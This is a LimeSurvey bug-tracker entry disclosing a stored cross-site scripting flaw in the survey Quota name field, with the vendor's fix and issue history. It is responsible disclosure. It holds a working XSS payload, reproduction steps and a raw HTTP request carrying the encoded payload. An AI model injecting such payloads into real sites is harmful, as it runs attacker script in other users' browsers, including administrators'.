View Issue Details

IDProjectCategoryView StatusLast Update
15681Bug reportsLimeSurvey Websitepublic2020-05-04 09:43
Reportermisheljava Assigned Tomarkusfluer 
PrioritynoneSeveritypartial_block 
Status closedResolutionfixed 
Product Version3.21.1 
Fixed in Version3.21.2 
Summary15681: LimeSurvey 3.21.1 Cross Site Scripting Stored
Description

• Title: LimeSurvey 3.21.1 Cross Site Scripting (XSS) Stored
• Date: 18/12/2019
• Author: Guram Javakhishvili
• Email: misheljava@gmail.com, guramj@gmail.com
• Software : LimeSurvey 3.21.1
• Product Version: 3.21.1
• Vulnerability Type : Injection
• Vulnerability : Cross Site Scripting (XSS) Stored
LimeSurvey latest version 3.21.1 & LimeSurvey development version 4.0.0 suffer from reflective and persistent (Stored) cross site scripting and html injection vulnerabilities.
Insufficient validation of user input on the authenticated part of the Limesurvey application exposes the application to persistent cross site scripting (XSS) vulnerabilities.
These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server.

Steps To Reproduce

Steps to Reproduce:
The attacker needs the appropriate permissions but non-Admin (can be basic user role) in order to create Survey and then add Quota.
It was noted that the Add Quota function was found to be vulnerable to one instance of Stored Cross Site Scripting (XSS) vulnerability.
When the survey Quota being viewed, e.g. by an administrative user, the
JavaScript code will be executed in the browser.

Vulnerable parameter:
• Quota%5Bname%5D

XSS payload:
• me"onmouseover="alert('QuotaName')"style="position:absolute;width:100%;height:100%;top:0;left:0;"9e2ad//

Steps to reproduce:
Step 1 - Once the survey is created then open the survey and click on 'Quotas' at the bottom left hand side menu bar, click on it.
Once it is open then insert the above XSS payload into the Quote name field and click save. (See first screenshot)

http://localhost/limesurvey3.21.1/index.php/admin/quotas/sa/index/surveyid/158712#

You should notice XSS payload rendering in the browser straightaway. See second screenshot .

Additional Information

HTTP Request/Response with vulnerable parameter and the XSS payload:

POST /limesurvey3.21.1/index.php/admin/quotas/sa/newquota/surveyid/158712 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 632
Origin: http://localhost
Connection: close
Referer: http://localhost/limesurvey3.21.1/index.php/admin/quotas/sa/newquota/surveyid/158712
Cookie: LS-OOSUJAAJFRZHZYBG=tj260dpk0iuq6m9nkbtbcil9su; YII_CSRF_TOKEN=WkJDTFA4RDdmbUJvMVhVS0VNdXFaQzNCa2g5UnE1dnJRvylcV9_gUYN_cIoQdadDDRfuRrsY_3lxPsqhxgrh3A%3D%3D
Upgrade-Insecure-Requests: 1

YII_CSRF_TOKEN=WkJDTFA4RDdmbUJvMVhVS0VNdXFaQzNCa2g5UnE1dnJRvylcV9_gUYN_cIoQdadDDRfuRrsY_3lxPsqhxgrh3A%3D%3D&Quota%5Bid%5D=&Quota%5Bname%5D=Fname%22onmouseover%3D%22alert%28%27QuoteName%27%29%22style%3D%22position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%229e2ad%2F%2F&Quota%5Bqlimit%5D=2&Quota%5Baction%5D=1&Quota%5Bactive%5D=0&Quota%5Bactive%5D=1&Quota%5Bautoload_url%5D=0&QuotaLanguageSetting%5Ben%5D%5Bquotals_message%5D=Sorry+your+responses+have+exceeded+a+quota+on+this+survey.&QuotaLanguageSetting%5Ben%5D%5Bquotals_url%5D=&QuotaLanguageSetting%5Ben%5D%5Bquotals_urldescrip%5D=&submit=Submit+Query

HTTP/1.1 302 Found
Date: Wed, 18 Dec 2019 23:47:20 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9
X-Powered-By: PHP/7.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: http://localhost/limesurvey3.21.1/index.php/admin/quotas/sa/index/surveyid/158712
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

TagsNo tags attached.
Complete LimeSurvey version number (& build)limesurvey3.21.1+191210
I will donate to the project if issue is resolvedNo
BrowserChrome & Firefox
Database & DB-VersionDB Server version: 10.4.6-MariaDB Database client version: libmysql - mysqlnd 5.0.12-dev - 20150407
Server OS (if known)
Webserver software & version (if known)
PHP VersionPHP version: 7.3.9

Activities

misheljava

misheljava

2019-12-19 14:40

reporter  

image.png (105,060 bytes)
image-2.png (109,496 bytes)
image-3.png (51,873 bytes)   
image-3.png (51,873 bytes)   
markusfluer

markusfluer

2019-12-19 16:37

administrator   ~55096

Fix committed to master branch: http://bugs.limesurvey.org/plugin.php?page=Source/view&id=29294

lime_release_bot

lime_release_bot

2020-02-03 14:53

administrator   ~55648

Fixed in Release 4.0.0+200116

Related Changesets

LimeSurvey: master a5f31781

2019-12-19 16:37:11

markusfluer

Details Diff
Fixed issue 15681: LimeSurvey 3.21.1 Cross Site Scripting Stored Affected Issues
15681
mod - application/views/admin/quotas/_newanswer_equation.php Diff File
mod - application/views/admin/quotas/newanswer_view.php Diff File
mod - application/views/admin/quotas/viewquotas_quota_actions.php Diff File
mod - application/views/admin/quotas/viewquotas_quota_members.php Diff File
add - third_party/vimeo/psalm Diff File

Issue History

Date Modified Username Field Change
2019-12-19 14:40 misheljava New Issue
2019-12-19 14:40 misheljava File Added: image.png
2019-12-19 14:40 misheljava File Added: image-2.png
2019-12-19 14:40 misheljava File Added: image-3.png
2019-12-19 14:58 cdorin View Status public => private
2019-12-19 14:58 cdorin Description Updated View Revisions
2019-12-19 14:58 cdorin Steps to Reproduce Updated View Revisions
2019-12-19 14:58 cdorin Additional Information Updated View Revisions
2019-12-19 15:06 cdorin Assigned To => cdorin
2019-12-19 15:06 cdorin Status new => assigned
2019-12-19 16:27 cdorin Assigned To cdorin => markusfluer
2019-12-19 16:37 markusfluer Changeset attached => LimeSurvey master a5f31781
2019-12-19 16:37 markusfluer Note Added: 55096
2019-12-19 16:37 markusfluer Resolution open => fixed
2019-12-19 16:37 markusfluer Status assigned => resolved
2019-12-19 16:37 markusfluer Fixed in Version => 3.21.2
2020-02-03 14:53 lime_release_bot Note Added: 55648
2020-02-03 14:53 lime_release_bot Status resolved => closed
2020-05-04 09:43 ollehar View Status private => public